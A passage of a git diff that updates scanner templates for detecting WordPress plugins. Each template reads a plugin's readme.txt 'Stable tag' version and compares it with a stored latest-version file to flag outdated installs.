compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-nextend-facebook-connect.txt b/technologies/wordpress/wordpress-nextend-facebook-connect.txt new file mode 100644 index 0000000000..d40b13a3fb --- /dev/null +++ b/technologies/wordpress/wordpress-nextend-facebook-connect.txt @@ -0,0 +1 @@ +3.1.7 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-nextend-facebook-connect.yaml b/technologies/wordpress/wordpress-nextend-facebook-connect.yaml index 7745e22a42..a8f7176000 100644 --- a/technologies/wordpress/wordpress-nextend-facebook-connect.yaml +++ b/technologies/wordpress/wordpress-nextend-facebook-connect.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/nextend-facebook-connect/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-nextend-facebook-connect.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-nextgen-gallery.txt b/technologies/wordpress/wordpress-nextgen-gallery.txt new file mode 100644 index 0000000000..9ec58f6633 --- /dev/null +++ b/technologies/wordpress/wordpress-nextgen-gallery.txt @@ -0,0 +1 @@ +3.30 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-nextgen-gallery.yaml b/technologies/wordpress/wordpress-nextgen-gallery.yaml index 79a5bbfd65..7770511372 100644 --- a/technologies/wordpress/wordpress-nextgen-gallery.yaml +++ b/technologies/wordpress/wordpress-nextgen-gallery.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/nextgen-gallery/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-nextgen-gallery.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-ninja-forms.txt b/technologies/wordpress/wordpress-ninja-forms.txt new file mode 100644 index 0000000000..37a142c49b --- /dev/null +++ b/technologies/wordpress/wordpress-ninja-forms.txt @@ -0,0 +1 @@ +3.6.14 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-ninja-forms.yaml b/technologies/wordpress/wordpress-ninja-forms.yaml index 03bcd5b0eb..1cf3168ebc 100644 --- a/technologies/wordpress/wordpress-ninja-forms.yaml +++ b/technologies/wordpress/wordpress-ninja-forms.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/ninja-forms/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-ninja-forms.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-ocean-extra.txt b/technologies/wordpress/wordpress-ocean-extra.txt new file mode 100644 index 0000000000..703cec9e23 --- /dev/null +++ b/technologies/wordpress/wordpress-ocean-extra.txt @@ -0,0 +1 @@ +2.0.6 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-ocean-extra.yaml b/technologies/wordpress/wordpress-ocean-extra.yaml index 696288d0dc..62ba4726ec 100644 --- a/technologies/wordpress/wordpress-ocean-extra.yaml +++ b/technologies/wordpress/wordpress-ocean-extra.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/ocean-extra/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-ocean-extra.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-official-facebook-pixel.txt b/technologies/wordpress/wordpress-official-facebook-pixel.txt new file mode 100644 index 0000000000..e46454be8c --- /dev/null +++ b/technologies/wordpress/wordpress-official-facebook-pixel.txt @@ -0,0 +1 @@ +3.0.8 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-official-facebook-pixel.yaml b/technologies/wordpress/wordpress-official-facebook-pixel.yaml index cb9084af53..6ecacefd30 100644 --- a/technologies/wordpress/wordpress-official-facebook-pixel.yaml +++ b/technologies/wordpress/wordpress-official-facebook-pixel.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/official-facebook-pixel/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-official-facebook-pixel.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-one-click-demo-import.txt b/technologies/wordpress/wordpress-one-click-demo-import.txt new file mode 100644 index 0000000000..6ebad14888 --- /dev/null +++ b/technologies/wordpress/wordpress-one-click-demo-import.txt @@ -0,0 +1 @@ +3.1.2 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-one-click-demo-import.yaml b/technologies/wordpress/wordpress-one-click-demo-import.yaml index f9cdcbc1a4..730dd664e2 100644 --- a/technologies/wordpress/wordpress-one-click-demo-import.yaml +++ b/technologies/wordpress/wordpress-one-click-demo-import.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/one-click-demo-import/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-one-click-demo-import.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-optinmonster.txt b/technologies/wordpress/wordpress-optinmonster.txt new file mode 100644 index 0000000000..c200bec4af --- /dev/null +++ b/technologies/wordpress/wordpress-optinmonster.txt @@ -0,0 +1 @@ +2.11.1 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-optinmonster.yaml b/technologies/wordpress/wordpress-optinmonster.yaml index 7e66ca6805..9022e2f04d 100644 --- a/technologies/wordpress/wordpress-optinmonster.yaml +++ b/technologies/wordpress/wordpress-optinmonster.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/optinmonster/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-optinmonster.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-password-protected.txt b/technologies/wordpress/wordpress-password-protected.txt new file mode 100644 index 0000000000..a4db534a2d --- /dev/null +++ b/technologies/wordpress/wordpress-password-protected.txt @@ -0,0 +1 @@ +2.5.3 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-password-protected.yaml b/technologies/wordpress/wordpress-password-protected.yaml index eea08c299b..97cd35b56e 100644 --- a/technologies/wordpress/wordpress-password-protected.yaml +++ b/technologies/wordpress/wordpress-password-protected.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/password-protected/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-password-protected.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-pdf-embedder.txt b/technologies/wordpress/wordpress-pdf-embedder.txt new file mode 100644 index 0000000000..101d404f94 --- /dev/null +++ b/technologies/wordpress/wordpress-pdf-embedder.txt @@ -0,0 +1 @@ +4.6.4 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-pdf-embedder.yaml b/technologies/wordpress/wordpress-pdf-embedder.yaml index 2185419db3..8829499d83 100644 --- a/technologies/wordpress/wordpress-pdf-embedder.yaml +++ b/technologies/wordpress/wordpress-pdf-embedder.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/pdf-embedder/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-pdf-embedder.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-photo-gallery.txt b/technologies/wordpress/wordpress-photo-gallery.txt new file mode 100644 index 0000000000..ff2fd4fbef --- /dev/null +++ b/technologies/wordpress/wordpress-photo-gallery.txt @@ -0,0 +1 @@ +1.8.5 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-photo-gallery.yaml b/technologies/wordpress/wordpress-photo-gallery.yaml index 0679f410d3..34bec93cf2 100644 --- a/technologies/wordpress/wordpress-photo-gallery.yaml +++ b/technologies/wordpress/wordpress-photo-gallery.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/photo-gallery/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-photo-gallery.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-php-compatibility-checker.txt b/technologies/wordpress/wordpress-php-compatibility-checker.txt new file mode 100644 index 0000000000..a73b432544 --- /dev/null +++ b/technologies/wordpress/wordpress-php-compatibility-checker.txt @@ -0,0 +1 @@ +1.5.2 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-php-compatibility-checker.yaml b/technologies/wordpress/wordpress-php-compatibility-checker.yaml index 137962d5f8..30abf1b78b 100644 --- a/technologies/wordpress/wordpress-php-compatibility-checker.yaml +++ b/technologies/wordpress/wordpress-php-compatibility-checker.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/php-compatibility-checker/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-php-compatibility-checker.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-pixelyoursite.txt b/technologies/wordpress/wordpress-pixelyoursite.txt new file mode 100644 index 0000000000..4f22ce3609 --- /dev/null +++ b/technologies/wordpress/wordpress-pixelyoursite.txt @@ -0,0 +1 @@ +9.2.2 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-pixelyoursite.yaml b/technologies/wordpress/wordpress-pixelyoursite.yaml index 192bfe4df1..bab37421aa 100644 --- a/technologies/wordpress/wordpress-pixelyoursite.yaml +++ b/technologies/wordpress/wordpress-pixelyoursite.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/pixelyoursite/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-pixelyoursite.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-polylang.txt b/technologies/wordpress/wordpress-polylang.txt new file mode 100644 index 0000000000..f30101c080 --- /dev/null +++ b/technologies/wordpress/wordpress-polylang.txt @@ -0,0 +1 @@ +3.3 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-polylang.yaml b/technologies/wordpress/wordpress-polylang.yaml index 8ae7c61e87..ecebfda87f 100644 --- a/technologies/wordpress/wordpress-polylang.yaml +++ b/technologies/wordpress/wordpress-polylang.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/polylang/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-polylang.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-popup-builder.txt b/technologies/wordpress/wordpress-popup-builder.txt new file mode 100644 index 0000000000..ed9a86f5ce --- /dev/null +++ b/technologies/wordpress/wordpress-popup-builder.txt @@ -0,0 +1 @@ +4.1.14 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-popup-builder.yaml b/technologies/wordpress/wordpress-popup-builder.yaml index 1469f1d84f..20c87dd3f1 100644 --- a/technologies/wordpress/wordpress-popup-builder.yaml +++ b/technologies/wordpress/wordpress-popup-builder.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/popup-builder/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-popup-builder.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-popup-maker.txt b/technologies/wordpress/wordpress-popup-maker.txt new file mode 100644 index 0000000000..507266ba01 --- /dev/null +++ b/technologies/wordpress/wordpress-popup-maker.txt @@ -0,0 +1 @@ +1.17.1 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-popup-maker.yaml b/technologies/wordpress/wordpress-popup-maker.yaml index 1dbb83c32c..e8072e7799 100644 --- a/technologies/wordpress/wordpress-popup-maker.yaml +++ b/technologies/wordpress/wordpress-popup-maker.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/popup-maker/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-popup-maker.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-post-duplicator.txt b/technologies/wordpress/wordpress-post-duplicator.txt new file mode 100644 index 0000000000..caafb14889 --- /dev/null +++ b/technologies/wordpress/wordpress-post-duplicator.txt @@ -0,0 +1 @@ +2.28 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-post-duplicator.yaml b/technologies/wordpress/wordpress-post-duplicator.yaml index 0c3d24f17b..0a86d3cb23 100644 --- a/technologies/wordpress/wordpress-post-duplicator.yaml +++ b/technologies/wordpress/wordpress-post-duplicator.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/post-duplicator/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-post-duplicator.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-post-smtp.txt b/technologies/wordpress/wordpress-post-smtp.txt new file mode 100644 index 0000000000..41bb57bd66 --- /dev/null +++ b/technologies/wordpress/wordpress-post-smtp.txt @@ -0,0 +1 @@ +2.1.10 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-post-smtp.yaml b/technologies/wordpress/wordpress-post-smtp.yaml index f2f81ec229..53cd9592ff 100644 --- a/technologies/wordpress/wordpress-post-smtp.yaml +++ b/technologies/wordpress/wordpress-post-smtp.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/post-smtp/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-post-smtp.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-post-types-order.txt b/technologies/wordpress/wordpress-post-types-order.txt new file mode 100644 index 0000000000..2bfa30ff0c --- /dev/null +++ b/technologies/wordpress/wordpress-post-types-order.txt @@ -0,0 +1 @@ +1.9.9.2 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-post-types-order.yaml b/technologies/wordpress/wordpress-post-types-order.yaml index f4df5a996e..b36043e265 100644 --- a/technologies/wordpress/wordpress-post-types-order.yaml +++ b/technologies/wordpress/wordpress-post-types-order.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/post-types-order/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-post-types-order.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-premium-addons-for-elementor.txt b/technologies/wordpress/wordpress-premium-addons-for-elementor.txt new file mode 100644 index 0000000000..a619b06993 --- /dev/null +++ b/technologies/wordpress/wordpress-premium-addons-for-elementor.txt @@ -0,0 +1 @@ +4.9.40 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-premium-addons-for-elementor.yaml b/technologies/wordpress/wordpress-premium-addons-for-elementor.yaml index 5654ede8a4..d38e84ea68 100644 --- a/technologies/wordpress/wordpress-premium-addons-for-elementor.yaml +++ b/technologies/wordpress/wordpress-premium-addons-for-elementor.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/premium-addons-for-elementor/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-premium-addons-for-elementor.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-pretty-link.txt b/technologies/wordpress/wordpress-pretty-link.txt new file mode 100644 index 0000000000..6a3913b049 --- /dev/null +++ b/technologies/wordpress/wordpress-pretty-link.txt @@ -0,0 +1 @@ +3.2.7 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-pretty-link.yaml b/technologies/wordpress/wordpress-pretty-link.yaml index 4845eb8026..d2069f1cfd 100644 --- a/technologies/wordpress/wordpress-pretty-link.yaml +++ b/technologies/wordpress/wordpress-pretty-link.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/pretty-link/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-pretty-link.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-really-simple-captcha.txt b/technologies/wordpress/wordpress-really-simple-captcha.txt new file mode 100644 index 0000000000..f577dfda01 --- /dev/null +++ b/technologies/wordpress/wordpress-really-simple-captcha.txt @@ -0,0 +1 @@ +trunk \ No newline at end of file diff --git a/technologies/wordpress/wordpress-really-simple-captcha.yaml b/technologies/wordpress/wordpress-really-simple-captcha.yaml index 9f5902739c..3889e59197 100644 --- a/technologies/wordpress/wordpress-really-simple-captcha.yaml +++ b/technologies/wordpress/wordpress-really-simple-captcha.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/really-simple-captcha/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-really-simple-captcha.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-really-simple-ssl.txt b/technologies/wordpress/wordpress-really-simple-ssl.txt new file mode 100644 index 0000000000..d089f6d748 --- /dev/null +++ b/technologies/wordpress/wordpress-really-simple-ssl.txt @@ -0,0 +1 @@ +6.0.12 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-really-simple-ssl.yaml b/technologies/wordpress/wordpress-really-simple-ssl.yaml index cefd39582c..9a0f1bc54b 100644 --- a/technologies/wordpress/wordpress-really-simple-ssl.yaml +++ b/technologies/wordpress/wordpress-really-simple-ssl.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/really-simple-ssl/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-really-simple-ssl.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-redirection.txt b/technologies/wordpress/wordpress-redirection.txt new file mode 100644 index 0000000000..229793ae14 --- /dev/null +++ b/technologies/wordpress/wordpress-redirection.txt @@ -0,0 +1 @@ +5.3.5 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-redirection.yaml b/technologies/wordpress/wordpress-redirection.yaml index eff92ffab6..dac0b15e8f 100644 --- a/technologies/wordpress/wordpress-redirection.yaml +++ b/technologies/wordpress/wordpress-redirection.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/redirection/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-redirection.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-redux-framework.txt b/technologies/wordpress/wordpress-redux-framework.txt new file mode 100644 index 0000000000..007c71d612 --- /dev/null +++ b/technologies/wordpress/wordpress-redux-framework.txt @@ -0,0 +1 @@ +4.3.21 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-redux-framework.yaml b/technologies/wordpress/wordpress-redux-framework.yaml index 